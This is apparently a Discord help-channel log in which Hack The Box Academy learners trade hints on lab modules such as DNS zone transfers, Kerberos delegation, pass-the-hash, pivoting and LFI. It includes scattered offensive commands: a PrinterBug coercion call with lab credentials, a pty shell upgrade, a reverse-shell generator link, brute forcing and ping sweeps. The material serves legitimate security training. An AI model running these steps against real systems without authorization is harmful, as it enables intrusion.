I queried all subdomains from the screenshot. Only internal allowed zone transfer. I queried every subdomain from internal, none allowed zone transfers. I tried querying and bruteforcing every subdomain from the screenshot, only dev returned anything. The subdomains I found, I all queried and brute forced and hit bedrock again. Unless I missed something really obvious I'm out of ideas again. For an academy module this is frustrating as hell. I give up for today.
Hey Guys I'm in "Attacking Common Services - Hard" after getting F** password, I don't C a way 2 continue ...
with what?
@languid dawn #modules message
a box?
with hacking someone account
I mean, at least he tried xd
If dev gives something back, it is a zone 😉
This section requires a deep understanding of DNS.
I ||understand I'm need 2 create a local linked server||, but I can't manage 2 do so...
Well, I am trying to do the SQLi module, but when I am following the steps in the module I am getting this problem.
With a blank password.
you are trying to connect to yourself
Yes?
first you are on the right path and the output look good but you don't get a wordlist for some reason?
so are you running a mysql server on your kali?
I should connect to the target given by the module?
I am trying.
of course
Alr alr.
hint you are on a some what right path but wrong idea
OK i will continue with that hint and more reading up tomorrow. Thanks for the hint. For now my head hurts 😄
Yea, think about what you are reading or saying, and what you are actually seeing. This threw me off for a bit of time.
What you like or dislike is absolutely irrelevant in this channel.
Stick to the #rules or feel the 👢 of a mod/Admin
my god U killed me right now....
gobuster vhost --random-agent
or
gobuster vhost --useragent yourstring
In-depth explanation and examples of Gobuster, a brute force tool for web directories/files, subdomains and vhosts.
maybe another 1 please?
a better way to put this is you don't need to create anything
the cheat sheet does not work for HTB academy
no i'm communist
not sure what 2 do next,
thanx anyway 👍
hint go back to the ||SQL|| section there is some example for this ||(near the end)||
pretty sure if you ask it the right thing it will help you
if you ask that then of course 🤣
just use https://www.revshells.com/
@rustic sage also read #welcome and #rules after that use /verify at #bot-commands and if you have questions that isn't about the academy module pls ask that in either #general or #hacker-lounge or #1024429874246590575 thk
Fixed it by switching to the pwnbox
Module: Winprivesc - Section: DnsAdmins: i'm part of domain adm with netadm but can't read the flag on admin desktop. is this correct?
How have mods not cleaned up this mess still
how do you convert a RID decimal you obtain from a SID into hex like in this module - https://academy.hackthebox.com/module/143/section/1269
this paragraph:
While looking at users in rpcclient, you may notice a field called rid: beside each user. A Relative Identifier (RID) is a unique identifier (represented in hexadecimal format) utilized by Windows to track and identify objects. To explain how this fits in, let's look at the examples below:
The SID for the INLANEFREIGHT.LOCAL domain is: S-1-5-21-3842939050-3880317879-2865463114.
When an object is created within a domain, the number above (SID) will be combined with a RID to make a unique value used to represent the object.
`So the domain user htb-student with a RID:[0x457] Hex 0x457 would = decimal 1111, will have a full user SID of: S-1-5-21-3842939050-3880317879-2865463114-1111.`
This is unique to the htb-student object in the INLANEFREIGHT.LOCAL domain and you will never see this paired value tied to another object in this domain or any other.
However, there are accounts that you will notice that have the same RID regardless of what host you are on. Accounts like the built-in Administrator for a domain will have a RID [administrator] rid:[0x1f4], which, when converted to a decimal value, equals 500. The built-in Administrator account will always have the RID value Hex 0x1f4, or 500. This will always be the case. Since this value is unique to an object, we can use it to enumerate further information about it from the domain. Let's give it a try again with rpcclient. We will dig a bit targeting the htb-student user.
Module: Pivoting, Tunneling, and Port Forwarding
Chapter: Skills Assessment
Question: Submit the contents of C:\Flag.txt located on the Domain Controller.
Issue: I'm in the machine before the ||(172.16.6.25)|| DC ||(172.16.10.5)|| and as per the hints in here ||I should find a mount drive on it|| but I can't find the ||Z: drive|| as can be seen below
that's a normal decimal to hex conversion, you can just type in google "500 in hex" and it will tell you
Module: Kerberos Attacks
Question: Unconstrained Delegation - Users
callum.dixon:C@lluMDIXON has Unconstrained Delegation set and carole.rose:jasmine has genericwrite over callum.dixon. Using this information, try to compromise the domain and read the content of C:\flag.txt on DC01
I can't seem to get printerbug or krbrelayx.py to work properly, whenever I execute printerbug with
python3 printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 roguecomputer.inlanefreight.local
I get an error in krbrelayx that the MechType is unsupported any help please
I tried cyberchef and it gave me weird output
cyberchef probably works on the ascii representation of your input and not on the actual number 500
I know the admin one but other users will have other SIDs. Is that the same for 1111, 1112, 1113 etc...
So just google it basically?
you should probably take a quick detour and look up what hexadecimal/binary/decimal means and how the same number gets represented in each numeral system
google can do it, calculators can, you can calculate it manually or use a programming language to go from decimal to hex number representation. Its just a different way of writing the same number
hint: use one of the examples to get a list of users and their RIDs (in hex), convert the number in the question into hex and compare that with the list you got
I understand them. Looking for a quick way to convert to enumerate rids using rpcclient if I need to
May I get a hint for this please
I see what you're saying I was speaking in general. If I have a user named sam in my ad set wouldn't it have a different RID than the examples?
since it's immutable?
not sure but i think so
also you can google for a quick Hexadecimal to Decimal converter if you want to do the converting the other way around
See what I mean. If I get a list of SIDs, I am trying to find an easy way to grab the RID off the end and convert it to hex to enumerate them in rpcclient to get a user list to password spray using cme or other tools. If I just Google it I get the needed answer.
Thanks all
HTB representing at DEF CON this year 💪
yeah can't wait for the new prolab
Do you guys feel that Server-side attack module needs a rework? I haven't finished it yet, but I feel it's so long, yet I'm barely understanding a thing compared to any other module.
Server-Side attacks was okay, skills assessment barely covered stuff in the module though. The API attacks and Session Security ones definitely need a little bit more improvement
Anyone available for a DM I have a few questions on how to do this attack
Hi, I'm currently doing Attacking SQL Databases and for the life of me I can't connect to the MSSQL port (HTB provided credentials). I used mssqlclient.py and sqsh on both my host machine and the browser machine and I can't connect to the share. I even copied and pasted the cheatsheet and just changed the IP and creds and I still can't connect. Anyone else having this problem?
I am learning SQLi but I would like to know, how do we know we are admin? We should know a username to be connected as admin, right?
looks like whatever shell you're using doesn't support changing directories
just use your commands with full paths instead of cd first
you don't have to cd to / and then ls, you can just ls /
that or get a more flexible shell going
dealers choice
Probably upgrade to a pty shell
So do the python pty upgrade
python3 -c 'import pty;pty.spawn("/bin/sh")'
It's a fairly basic command I'm surprised it's not in the section
The getting started: nibbles does go over a reverse shell method
I'd highly recommend though following the module's way first, and then trying to find alternative ways
As the video you watched was probably the actual retired box, and not related to how academy wants to teach it
Just that server:port
It's a docker container with a public ip
Since it's a docker container though high likelihood its a website and you can visit http://ip:port
None of those
You're looking for a vulnerable plugin
:)
And iirc when you visit the page, it's nice enough to tell you
Look it up and find out
Iirc there's only one that regards file reading
for attacking common applications > skills assessment 3, the given RDP creds just don't seem to work. the command i'm using is rdesktop -u Administrator -p xcyj8izxNVzhf4z 10.129.95.200. the RDP connection initiates, but when i get to the rdesktop interface, the login screen greets me with "That username or password is incorrect, try again". i'm not really sure what i'm doing wrong here - the creds are the provided ones, the VPN is up, but it just doesn't accept the creds it's supposed to.
try xfreerdp
that worked, thanks
pog
Hi! Can anyone help me through DMs or from here? I'm stuck doing the File Inclusion Prevention section and I have a question about the second question. To rewrite the php.ini files, do you need to do a sudo chown to change the file ownership from the root user to the htb-user? I have tried a lot of things and nothing seems to disable the system function
Or you can do sudo vim/nano/whatever editor
Well I am stuck at the module SQLi, the section "Using Comments", I do not understand why it's telling me it's failed,
I tried ||tom, root, admin, user||.
hello all, please give me a hint on this question .... I am not able to spawn a reverse shell although I followed the steps in the module
section: password attacks
module: pass the hash
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
appreciate any help
i can't connect to DC01, i just connect to MS01
Nvm found.
anyone? 🥺
I would guess either you're not following the directions precisely or you need to reset the environment.
splunk module
That is indeed the splunk module
yep need help w that question
What have you tried?
I followed what is in the module notes, but I can only connect to MS01
Just looking around should help
It seems to be clearly telling you to connect to MS01 and then to DC01. Did you try that?
It actually gives a clear example of what to do
I say that as I'm struggling with what should be an easy challenge. Broken Authentication - Predictable Reset Token - question 2. I know the encoding and token format. I've tried variations and still can't get it to work. Feels like it should be something simple I'm not doing right.
sprays windex on it
Just to understand how to avoid having SQLi on a website, we have to block any special character like space, ', (, etc., no?
When we use MySQL, etc.
No. Parameterized or 'bound' sql statements
Trying to implement a filter is not a good solution
Something like from the answer here https://stackoverflow.com/questions/13190392/how-can-i-bind-a-list-to-a-parameter-in-a-custom-query-in-sqlalchemy
Hi can someone help me with the docker section for Linux Priv Esc? I am unsure of where to start after you SSH into the target machine
Just follow the section
The command you need to exploit is literally given at the end
Nope
thanks. was able to get root and find the flag 🙂
You’re welcome 👍🏼
Module: Broken Authentication
Section: Predictable Reset Token
Question: ```
Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
Can I get some help with this? I have code thats functioning, but I cant get the solution.
Wait, what?
Your code works, but it doesn't work?
Your code must generate tokens based on the time displayed.
If you look closely at the token from the user, the time is given in Unix Timestamp format. That means in milliseconds
This means that you have to create a token for the given time +/-1000 milliseconds. So in total 2001 tokens.
Your script must then test these against the page.
works in that it generates tokens, send them, and i get responses, but no correct token submissions
If I brute force a random site without permission, will there be any problems?
I'm stuck on the first part of WINDOWS EVENT LOGS & FINDING EVIL, Windows Event Logs. I tried many things when looking into the logs and backtracking. I feel like there wasn't enough of an explanation on where I should be looking, I tried their links and read through, but nothing helped. Could really use some advice on this
@acoustic owl could you glance at my code and tell me if im way off?
I am not at the PC and have only the cell phone to read the text. But I can try
Any attack without authorization leads to problems
hey guys, I'm stuck in the Password Attacks Lab Hard, any hint regarding
to brute force?
i'm doing the password attack lab
how long did it take anyone who completed this lab to get the username and password?
how many files did you download from the resources?
just the one password file
and ofc i did the mut_password.list file as well
@iron plaza
you sure you tried it with the mutated file?
i haven't done that file yet, just running the regular password.list file first
well try that aswell
eta on how long that will take ?
Anyone can help me ? I also tried the PetitPotam.py exploit but I keep getting “200 OK” followed by HTTP headers and HTML in the body.
it will take a long time through ssh, do it with smb, it's the same password 🙂
smb doesn't work
do a nmap and look what other services you get, try ftp
Can anyone help me??
i'm stuck with this question a few hours
wow, i got it 🦾
if someone can help me through
who complete LFI module
Bypass basic path traversal filter is not working
how can i bypass that
The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
how can i bypass that
I can't understand how all the guys I read have gotten the "action.php" file with the "id" parameter in SQLMap Essentials - Skills Assessment. I've checked all the minishop webpage, I've used dirb and ffuf to find files or directories, but I can't get it. CAN ANYONE HELP ME WITH THIS PLS?
So you have not seen the action.php show up? Is that the question?
for Linux Priv Esc under Python Library Hijacking section, I am unsure of how to proceed:
You're real close here, look at the section and see where they are starting out with the /
Asking for a (newbie) recommendation, what distro do you guys use rn?
Most people use kali or parrot
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Alright, thank you @fathom pendant
Try changing the language on the page and pay close attention to the URL when you do.
i use manjaro
was planning on switching to NixOS but not sure yet
The section goes over what to do here. Look at what the Python file is importing, and see if you can hijack that.
Can I DM you?
sure thing
Seems like that is not it...
again, look at the URL when you choose a language, you are starting in the wrong place for the LFI. Where is the / ?
add languages parameter
is there a python course for beginners somewhere?
bro, go and read books, I think it's a good source
you get a lot of knowledge that the courses don't give you
Module: Attacking Thick Client Applications
The doco explains to right click on the address and select "Dump Memory to File"
This has been asked a couple of times here with no 'non-DM' answer, can someone please assist? For context, this is what I'm looking at
EDIT: For people that come across the same issue, to find the "Dump Memory to File" option you need to go back to the Memory Map tab (after identifying you have MZ in your magic bytes) and right click on the address in that section
EDIT2: If you are having issues with the memory map refreshing too much, saw this asked a couple of times too, sort the information in here by the address column, a little harder to track the entry but a million times easier than a bouncing list.
Introduction to Windows Command Line
on the skills assessments,
none of these account names got accepted as a flag
need any hint or clarification if I'm doing something wrong
Don't use a filter
As in don't filter by amount
Because the question is specifically stating "multiple in a row"
I believe the module/section gives an example using a table format which grants a larger picture
u mean the filter hash table ?
I just mean whatever is giving you that count hold on
Read the question carefully, and ask yourself on which machine you are currently on
Also that
Are you logged into the domain controller?
yeah, once I got in the machine I did ssh to to DC
https://www.itprotoday.com/powershell/how-find-failed-logon-attempts-powershell this is what I used
well, ty but it didn't tell more than the event section
So you've done the |Select-Object TimeCreated, Message | Format-Table -Wrap?
yeah
The output that you showed earlier had truncated output
That's why I was confused
You may need to manually parse through some of the info to actually see it
yeah got u, The problem that I don't know what am doing wrong,
and to be honest after 2 days I saw a video for its solution and with the same steps it doesn't show the same output that contain the flag
I think your command is slightly off
That's the thing if you copy/paste the command from the site I linked, it should give it to you
So there's something that you're doing incorrectly
I should look at this part of every message u meant ?
Whether it's not actually being connected to the DC or adding filters that you don't need
Yes
looked at it for so long and the same thing 😦
Once you scroll through it for a bit, you'll find it easily
Because the answer isn't an actual account name on the system, which is throwing you off
I believe
Your filter was filtering just accounts on the system, which wasn't showing the full picture
admin isn't necessarily the wrong thought path however
get-winevent -filterhashtable @{logname='security';id='4625'} | foreach-object{$_.properties[5].value} | group-object | select-object count,name
you can try it, i believe it will give u the answer
You don't need the foreach
Yeah your idea was in the right place but your filter is just not right
to prove that I'm DC xd
Use the command given in the website I linked earlier
will reset the machine and try again
tried it again and the same output 
Your command or the one from the website
the one from the website that show every message
so when I ssh from my machine to user10
then I ssh to user10 again
I think am an idiot here or am doing it right ?
You should be ssh to the dc as user10
ssh user10@<IP>
am doing it with that ^


Hey guys, I'm kinda stuck right now on the Knowledge Check of the "Getting started" module, I feel like I'm missing something really stupid, I already tried to run an RCE vuln on it, I also tried GetSimpleCMS PHP File Upload Vulnerability but I get Auth failed (I already made sure to check it's the right username and password), I also tried XSS on theme-edit.php but the upload button doesn't seem to be working and tried a reverse shell but I don't get any response
@fathom pendant ty and sry for the headache bro, I think i got crazy xd
yeah
Which is what we were trying to tell you xD
the problem that I didn't notice it because in the previous questions starting from user7 I was doing it right
suddenly it went away from my mind
Gl in future!
Hello everyone, did any of you have a segfault when starting the msfvenom payload on the ubuntu box?
I get the same issue as this guy
Is it because i created the payload on a arm machine for a x64 one ?
what is the output of the arch command?
if you are on an arm system it still shouldn't matter (I think), but if the normal elf shell doesn't work try metasploit web delivery
is it possible to give where im at and what im thinking for whitebox attacks skills assessment to see if im in the ball park?
Anyone know why I'm unable to rdp onto windows box in the ad enum and attack module using xfreerdp /u:htb-student /p:'Academy_student_AD!' /v:ip
in general you need to give the AD boxes a good few min to fully boot up before you can even use them
also if you are having timeout issue you can use /timeout:80000
If I tried to rdp in while it's setting up could that break the box?
can't say for sure but personally I do feel like some of the AD boxes do get a bit more buggy if you touch them before they're fully booted up, but that could just be a me thing
Okay thanks I'll revert and wait 5 mins before I rdp in
Still not working. I've noticed in the past I have had to click accept or continue on a blue screen before the desktop loads, is there a command to auto accept this?
Currently the rdp window opens but is just a black screen
which section are you on? I'll give that a try
Kerberoasting with windows
When I add the timeout flag it worked immediately?
Brings up a computer access policy screen
That's weird I thought the log would have said something about the timeout
Ty
can anyone help with whitebox attacks skills assessment?
@wanton estuary thought i might as well send you the screenshot i make for this
Cheers
I did it, but wasted half a day because of the wrong wordlist 😦
Thanks for you time and patience 🙂 Mind if i add you?
Sure, dm me.
Do I really have to scan for 4 hours? (Pivoting, Tunneling, and Port Forwarding - Skill assessment)
Nmap through proxychains sucks
welp f
Try a different method of ping sweep
aaaaa
Hint: check the ip of the target you're connected to. That's where you can start
Can anyone give me an example? I cannot get the DNS working in ATTACKING COMMON SERVICES - Attacking DNS.
Found it, thanks
Are you adding the ip to your command?
yes and no, tried with and without (you gave me earlier this hint) but i didnt get what i was expecting. Can you give me an example? So i can see what i am doing wrong.
After reboot, it did work now
This is the subbrute one
yes
Why doesn't this work?
for j in {0..5}; do (for i in {1..254} ;do (ping -c 1 172.16.$j.$i | grep "bytes") ;done | grep "bytes from");done
and I do not have to add any of the (sub)domains to /etc/hosts?
Cmd vs powershell
It's bash
I want to scan all the IPs with one script, my old solution was to copy paste xd
You need to add the inlanefreight.htb to your /etc/hosts
ok, thanks.
Is the first host linux?
I honestly forget
if you are going off your previous screenshot, then first, you didn't use proxychains when running the ping, and second, proxychains doesn't support ICMP traffic
oh in this case it's working fine
I assume I also should be doing this with newly found subdomains?
I just want to make it into a one-liner, but the one-liner I tried to make didn't work
wait but why do you need to sweep all 254 networks? you can just sweep the network that your target box is connected to
Well once you find the correct subdomain, it should just be a dig request
Can you please just help me make the script? This is the subnet I need to scan
Put a $ in front of the ( before the second for loop btw
But it looks like you got 2 responses in your ping
Yo
This screenshot shows 2 responses
Again, my problem is not that I can't do it, it's just that I want to make it into a one-liner instead of having to copy paste the script with small tweaks
That's outside the scope of the module tbh
Just look into bash scripting if you wanna figure it out
I just want help with this, it's like when I ask my math teacher for a problem that he knows how to solve but doesn't want to help because it's for the next lesson, but ok
I think if you're doing a command within a command you need to do $()
I'll google it then lol
for i in {0..5}; do for j in {1..254}; do ping -c 1 172.16.$i.$j | grep "bytes" ; done | grep "bytes from"; done
Works fine.
ah oke xd, sorry
I was gonna say I wasn't sure if the parentheses were even necessary
So I don't need parentheses?
Can't test with the subnet, so can't confirm whether it gives you precisely the result you want, but if you remove the " from", it gives:
(pulled that answer from 1st hit on Google)
It just sits there xd
Yeah it will do
Bytes from is to grab the response
If there's no response
^
You haven't terminated both for loops
Every single ping that fails will take longer
You're waiting on it basically to go from 0 to 5.x while pinging every 0.00 to 0.254 along the way
Yeah, that's going to take.... 212 minutes if none are up
That's why I said to figure out what subnet you're on. You can basically make a "smart" sweep
How come when I just copy pasted it I finished it in like 10 seconds?
Can I ask, why don't you just use fping?
oh
I don't think fping is on the target system? Unless it's a default util
sadge
Yep
It's still good to know how to do
Like the one scanning 172.16.0-5.x
Yeah yeah. Just might confuse people. No delay on the sequential task, as it doesn't wait for each to finish.
Good shout on the backgrounding o/
so
for i in {0..5}; do for j in {1..254}; do ping -c 1 172.16.$j.$i | grep "bytes" &; done | grep "bytes from"&; done
nvm, I don't think it's possible with what I know, I'll come back to it later lol
I think you need the parentheses around the ping and first grep
for i in {0..5}; do (for j in {1..254}; do (ping -c 1 172.16.$i.$j | grep "bytes" &); done | grep "bytes from" &); done
If you do it like this:
for i in {0..5}; do for j in {1..254}; do (ping -c 1 172.16.$i.$j | grep "bytes" &); done | grep "bytes"; done
Then it will do the i loop each in turn
What if subbrute only gives errors? Any alternative tool?
```
./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
Process lookup-3:
Traceback (most recent call last):
  File "/usr/lib/python3.9/multiprocessing/process.py", line 315, in _bootstrap
    self.run()
  File "/home/htb-ac-750268/Desktop/subbrute/./subbrute.py", line 422, in run
    response = self.check(hostname, query_type, timeout_retries)
  File "/home/htb-ac-750268/Desktop/subbrute/./subbrute.py", line 342, in check
    resp = self.resolver.query(host)
  File "/home/htb-ac-750268/Desktop/subbrute/./subbrute.py", line 57, in query
    name_server = self.get_ns()
  File "/home/htb-ac-750268/Desktop/subbrute/./subbrute.py", line 107, in get_ns
    ret = self.nameservers[self.pos]
IndexError: list index out of range
```
Plus after manually checking records, I could not find anything that remotely looked like a flag other than the cookie.
True
Try just having inlanefreight.htb in your resolvers.txt
It works now, thanks👍
Should thank @lavish cave too for the backgrounding 😉
Hello. I have a few questions regarding HTB Academy:
1) The exam: Can I get a student subscription for a few months until I'm done with the pentester path and then pay 200 for the exam?
2) Exercises: Do the exercises require a VPN connection? If so, can I connect via an Express VPN connection, because my country blocks UDP connections?
3) The boxes: Is the subscription separate from access to retired boxes, or do I also get access to that?
4) Any opinions from someone who has been doing HTB Academy would be appreciated.
I am struggling on OffSec and need more material to learn from. That's why I'm thinking of enrolling in HTB Academy
Thanks for the help qubasta and wolfiej then hehe
1) yes
2) i think you can't
3) it is separate
4) i'm starting soon too
True
Awesome let's start together
Can you complete the HTB academy module exercises without connecting to the VPN?
The answer to 2 is no, it requires the htb vpn, there is a tcp version of the download you can use
No you can't, I'm afraid
The labs are often like mini-ctfs
Do you guys recommend anything or any knowledge prereq before starting the pentesting path?
The only way to do so without connecting to the vpn is through the in-browser pwnbox (which can be limiting)
Infosec Fundamentals
Networking knowledge helps a lot
That path helps a lot
Any link or guide for this sir?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Done, had that with a typo. New results, but the new results don't bring anything useful. I don't know where to look now and what to do.
dig'd all the new subdomains
On #4: I've done all but the very latest content. Depending on your background, you may have a certain level of knowledge already in certain areas. My advice would be to do that content anyway and make notes around everything, as you never know what will be useful in the future, specifically within the academy, and also with other stuff in the future. Make sure to do research outside of the modules (especially the links they provide), and practice everything. The early stuff will probably be super easy, but it will get harder, so nailing the fundamentals is very important.
If you get stuck, try harder. People often think that means do the same thing, but really it means do more research, understand the problem more, try other things. It's very easy to slip into the trap of asking people for help when you get stuck (and sure, if you really are stuck, you should ask), but when you move beyond HTB, there probably won't be someone who has the answer, and you'll be on your own, so establishing a good ethic of trying everything you can think of will be helpful.
See what subdomains it digs up
Try smarter not harder. The try smarter mindset is what you described
I think both
dig'd them all:
```
./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.htb
hr.inlanefreight.htb
helpdesk.inlanefreight.htb
ns.inlanefreight.htb
control.inlanefreight.htb
Traceback (most recent call last):
  File "/home/htb-ac-750268/Desktop/subbrute/./subbrute.py", line 700, in run
    killproc(pid = verify_nameservers_proc.pid)
  File "/home/htb-ac-750268/Desktop/subbrute/./subbrute.py", line 721, in killproc
    os.kill(pid, 9)
ProcessLookupError: [Errno 3] No such process

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/htb-ac-750268/Desktop/subbrute/./subbrute.py", line 834, in <module>
    print_target(target, record_type, options.subs, options.resolvers, options.process_count, options.print_data, output, json_output)
  File "/home/htb-ac-750268/Desktop/subbrute/./subbrute.py", line 513, in print_target
    for result in run(target, query_type, subdomains, resolve_list, process_count):
  File "/home/htb-ac-750268/Desktop/subbrute/./subbrute.py", line 703, in run
    verify_nameservers_proc.end()
AttributeError: 'verify_nameservers' object has no attribute 'end'
```
Thanks
Also wrap your errors in triple backticks
What is in the resolvers.txt?
It is a requirement for the exam to finish all the Pentester Job Role Path Exercises correct?
Yes
inlanfreight.htb
You're missing an e
Btw @fathom pendant do you have a link or guide to getting the TCP VPN? I actually need it or else I won't be able to connect
yes, typed it wrong. I have the correct one in resolvers
https://help.hackthebox.com/en/ Look here
Hack The Box Help Center
Do it with ip, not with the domain
.htb is not an official TLD.
This means that the root servers can't resolve this TLD.
In the getting started module I believe it walks through how to set it up
Even if it's in /etc/hosts?
That makes no sense.
You write a domain as resolver and then the PC must resolve the resolver again?
Thanks guys
No, you are not dumb.
Don't worry, so many people make this mistake.
It works, but it requires additional effort for the PC.
I just couldn't recall how I did it
As I said, it works.
But a PC can basically do nothing with a domain. It must resolve this domain to an IP.
At least to connect to this host.
First question of this module does not accept the right answer. I have the version number in front of my screen and it's not accepting it. This is how I am entering it: X.X.XX
https://academy.hackthebox.com/module/77/section/726
Holy cow. Someone just said their exam report is 98 pages long. That's insane
In my answer I have no version but the application name...
Ah got it. Yes, the application name works. It's weird because question specifically asked the version name.
Lots of screenshots 😄
Yes, had the same struggle... that will happen more often 🙂